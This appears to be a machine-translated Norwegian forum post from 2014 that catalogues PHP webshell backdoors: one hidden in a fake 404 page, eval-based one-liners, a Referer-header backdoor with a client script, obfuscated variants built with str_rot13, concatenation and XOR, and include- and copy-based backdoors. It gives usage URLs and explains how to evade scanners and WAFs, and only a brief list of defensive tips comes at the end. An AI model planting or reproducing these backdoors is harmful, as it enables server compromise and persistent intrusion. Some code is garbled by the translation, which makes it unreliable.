Vi behandler disse PHP-bakdørsprogrammene med en læringsmentalitet, og mye PHP-bakdørkode lar oss se hvor velmenende programmerere er.
Kraftig PHP-bakdør i én setning
Denne typen bakdør gjør det mulig for nettsteder,Serveradministratorer er svært problematiske og må ofte endre metoder for å utføre ulike deteksjoner, og mange nye skriveteknikker kan ikke oppdages og håndteres med vanlige deteksjonsmetoder.
I dag skal vi telle noen interessante PHP-trojanere.
1. Skjul PHP-ponnier ved hjelp av 404 sider:
[mw_shl_code=php, sant] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 ikke funnet</title>
</head><body>
<h1>Ikke funnet</h1>
<p>Den etterspurte URL-en ble ikke funnet på denne serveren.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 ikke funnet');
?>[/mw_shl_code]
404-siden er en mye brukt fil på nettsiden, og få vil sjekke og endre den etter at den generelt er anbefalt, så vi kan bruke denne til å skjule bakdøren.
2. Skjult PHP uten funksjoner i én setning:
[mw_shl_code=php,true]<?php
session_start();
$_POST['kode'] && $_SESSION['theCode'] = trim($_POST['kode']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Tildel $_POST['kode'] til $_SESSION['theCode'], og kjør deretter $_SESSION['theCode'], med høydepunktet at det ikke finnes noen signaturkode.
Hvis du bruker et skanneverktøy for å sjekke koden, vil det ikke slå alarm og oppnå målet.
3. Super snikende PHP-bakdør:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
GET-funksjonen alene utgjør en trojaner;
Slik bruker du:
[mw_shl_code=php, sant]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Etter utførelse genererer den nåværende katalogen c.php en setningstrojaner, når parameteren A evalueres, feilet feilen Trojan-generering, og når den assertes, vil den også rapportere en feil, men den vil generere en trojansk hest, som ikke kan undervurderes.
Nivåforespørsel, kode for å kjøre PHP-bakdøren:
Denne metoden er implementert med to filer, fil 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace("", "+", implodere(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset=utf-8′);
//要执行的代码
$code= <<<KODE
phpinfo();
KODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= matrise(
CURLOPT_URL => $url,
CURLOPT_HEADER => FEIL,
CURLOPT_RETURNTRANSFER => SANT,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Kjør base64-kodet kode gjennom HTTP_REFERER i HTTP-forespørselen for å oppnå backdoor-effekten.
Det er bra å bruke denne ideen for å omgå WAF.
4.PHP bakdørsgeneratorverktøy Weevely
weevely er en PHP-spesifikk enWebshell-fri programvare kan brukes til å simulere et tilkoblingsskall likt telnet. Weevely brukes vanligvis til utnyttelse av webprogrammer, skjule bakdører eller bruke telnet-lignende metoder i stedet for sidebasert administrasjon. Server-side PHP-koden generert av Weevely er base64-kodet, slik at den kan lure mainstream antivirusprogramvare og IDS. Når du har lastet opp serverkoden, kan du vanligvis kjøre den direkte gjennom Weevely.
Funksjonene som brukes i bakdøren er ofte strengbehandlingsfunksjoner, og funksjoner som evaluering og system som brukes som inspeksjonsregler vil ikke vises direkte i koden, slik at bakdørfilen kan omgå sjekken av bakdørssøkeverktøyet. Skanning med dark groups web-bakdørsdeteksjonsverktøy viser at filen ikke er truet.
Ovenstående er en generell introduksjon, og de relevante bruksmetodene introduseres ikke her, men en enkel vitenskapelig popularisering.
4. Tre deformerte PHP-trojanere med én setning
Den første:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Den andre
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Skriv http://site/2.php?_=assert&__=eval($_POST['pass']) passord i kjøkkenkniven er pass.
Hvis du bruker tilleggsdataene fra kjøkkenkniven, er den mer skjult, eller du kan bruke andre injeksjonsverktøy fordi den sendes inn i ettertid.
Den tredje
[mw_shl_code=php, sant] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'legg til'); [/mw_shl_code]
str_rot13 ('riny') er den kodede evalueringen, som fullstendig unngår nøkkelord uten å miste effekten, noe som får folk til å kaste opp blod!
5. Til slutt, list opp noen avanserte bakdører for PHP-trojanere:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Tilgang"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
inkludere($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][navn]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Tilgang"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
For å oppsummere kan disse PHP-bakdørene beskrives som komplette; hvis du ikke er forsiktig, vil du definitivt bli lurt, og hva er dagens høyeste prioritet i artikkelen vår? Hovedpunktene finnes i sammendraget nedenfor!
Hvordan håndtere PHP en en-setnings bakdør:
Vi understreker noen få hovedpunkter, og hvis du leser denne artikkelen, tror jeg ikke du er en lekperson, så jeg skal ikke være langtekklig:
- Vær oppmerksom på sikkerhet når du skriver PHP-programmer
- Serverloggfiler bør leses ofte og sikkerhetskopieres ofte
- Streng tillatelsestildeling for hvert nettsted
- Hyppige batch-sikkerhetsgjennomganger av dynamiske filer og kataloger
- Lær hvordan du utfører manuell antivirus "Atferdsvurdering, undersøkelse og drap"
- Følg med, eller infiltrer en aktiv cybersikkerhetsleir
- Selv en funksjon kan brukes som regel for hierarkisk behandling av servermiljøet
Vi mener at når det er flere nettsteder å administrere og store mengder data, bør vi rimeligvis bruke noen hjelpeverktøy, men vi bør ikke stole helt på disse verktøyene, teknologien oppdateres og forbedres stadig, det viktigste er at du lærer og forstår tankegangen bak disse kraftige bakdørsfolkene, og rolleoverføring kan gi deg større fremgang.
|
Publisert på 01.12.2014 21:41:13
